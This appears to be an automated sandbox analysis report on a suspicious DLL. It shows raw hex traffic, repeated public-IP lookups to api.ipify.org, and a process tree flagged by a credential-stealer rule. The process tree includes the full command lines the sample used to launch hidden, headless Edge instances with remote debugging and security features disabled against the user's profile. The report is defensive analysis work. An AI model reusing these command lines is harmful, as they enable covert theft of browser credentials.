                                                                                                                                                      2025-01-14 12:25:37 UTC1369INData Raw: ed 4c 89 44 24 30 4d 8b f8 4c 89 4c 24 38 44 8b f2 89 54 24 24 48 8b f1 44 8b e5 44 8b c5 89 6c 24 20 39 69 5c 74 0a b8 06 02 00 00 e9 bc 07 00 00 ff 41 48 0f 57 c0 48 89 9c 24 28 01 00 00 49 b9 ff ff ff ff ff ff ff 7f 48 89 bc 24 e8 00 00 00 48 8d 1d a8 d3 ff ff 4c 89 ac 24 e0 00 00 00 49 bd 00 00 00 00 00 00 00 80 0f 29 b4 24 d0 00 00 00 0f 29 bc 24 c0 00 00 00 44 0f 29 84 24 b0 00 00 00 44 0f 29 8c 24 a0 00 00 00 44 0f 29 94 24 90 00 00 00 f2 44 0f 10 15 32 5e 17 00 44 0f 29 9c 24 80 00 00 00 f2 44 0f 10 1d a0 5e 17 00 0f 11 44 24 40 0f 11 44 24 50 0f 11 44 24 60 83 fa 01 0f 8e 71 03 00 00 0f b6 46 25 8d 4a fc 3b c8 0f 4e c1 4c 63 f8 4c 89 7c 24 28 40 38 6e 26 0f 85 38 01 00 00 44 8b f5 85 c0 0f 8e 42 02 00 00 48 8b 7c 24 30 48 8b dd f2 44 0f 10 05 c6
                                                                                                                                                      Data Ascii: LD$0MLL$8DT$$HDDl$ 9i\tAHWH$(IH$HL$I)$)$D)$D)$D)$D2^D)$D^D$@D$PD$`qF%J;NLcL|$(@8n&8DBH|$0HD


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.449956104.26.13.2054434564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:25:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:25:40 UTC423INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:40 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9c2b9f480c7c-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1534&rtt_var=576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1896103&cwnd=76&unsent_bytes=0&cid=6b4d5e6ca2d4d940&ts=134&x=0"
                                                                                                                                                      2025-01-14 12:25:40 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.449962104.26.13.2054434564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:25:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:25:41 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:41 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9c2f7e6742ca-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1595&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1749550&cwnd=252&unsent_bytes=0&cid=ad950303bd7d8f30&ts=176&x=0"
                                                                                                                                                      2025-01-14 12:25:41 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.449968104.26.13.2054434564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:25:42 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:25:42 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:42 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9c372af9c44a-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1531&rtt_var=585&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1907250&cwnd=228&unsent_bytes=0&cid=7cf2b6f5c54e3e9d&ts=159&x=0"
                                                                                                                                                      2025-01-14 12:25:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.449972104.26.13.2054434564C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:25:42 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:25:42 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:25:42 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9c3ae83942e2-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1590&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1815920&cwnd=187&unsent_bytes=0&cid=d0dcef28fecb8fc9&ts=136&x=0"
                                                                                                                                                      2025-01-14 12:25:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.450069104.26.12.2054437560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:26:34 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:26:35 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:34 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9d80993d333c-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1806&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1574123&cwnd=229&unsent_bytes=0&cid=7a4c79819e9a9495&ts=158&x=0"
                                                                                                                                                      2025-01-14 12:26:35 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      6192.168.2.450070104.26.12.2054437560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:26:35 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:26:35 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:35 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9d846f787281-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1778&rtt_var=691&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1554845&cwnd=218&unsent_bytes=0&cid=eb65c61671ddde6f&ts=141&x=0"
                                                                                                                                                      2025-01-14 12:26:35 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      7192.168.2.450072104.26.12.2054437560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:26:36 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:26:36 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:36 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9d8b4da70f4a-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1672&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1736028&cwnd=176&unsent_bytes=0&cid=a4aca4b2ba5abb3c&ts=153&x=0"
                                                                                                                                                      2025-01-14 12:26:36 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      8192.168.2.450073104.26.12.2054437560C:\Windows\System32\rundll32.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-14 12:26:37 UTC39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      2025-01-14 12:26:37 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Tue, 14 Jan 2025 12:26:37 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 901d9d8f2d8032c7-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1801&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1574973&cwnd=138&unsent_bytes=0&cid=f2ea704a30dd07b0&ts=158&x=0"
                                                                                                                                                      2025-01-14 12:26:37 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll"
                                                                                                                                                      Imagebase:0x7ff7ca030000
                                                                                                                                                      File size:165'888 bytes
                                                                                                                                                      MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
                                                                                                                                                      Imagebase:0x7ff60bdc0000
                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
                                                                                                                                                      Imagebase:0x7ff702580000
                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
                                                                                                                                                      Imagebase:0x7ff702580000
                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:07:24:13
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9928 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:07:24:14
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1616 --field-trial-handle=1468,i,6882349471306671242,18432269874765290371,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:07:24:14
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1480 --field-trial-handle=1524,i,7590272609190287249,10177671036043717879,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:07:24:16
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader
                                                                                                                                                      Imagebase:0x7ff702580000
                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:07:24:16
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 5408 -s 412
                                                                                                                                                      Imagebase:0x7ff638230000
                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:07:24:19
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers
                                                                                                                                                      Imagebase:0x7ff702580000
                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:07:24:19
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader
                                                                                                                                                      Imagebase:0x7ff702580000
                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:17
                                                                                                                                                      Start time:07:24:19
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 5472 -s 416
                                                                                                                                                      Imagebase:0x7ff638230000
                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:18
                                                                                                                                                      Start time:07:24:21
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9834 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:19
                                                                                                                                                      Start time:07:24:22
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1468,i,9150515577941078100,10285627021896123688,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:07:24:46
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9526 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:07:24:46
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1596 --field-trial-handle=1468,i,8283710897970219115,15923041528330294747,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:07:25:11
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
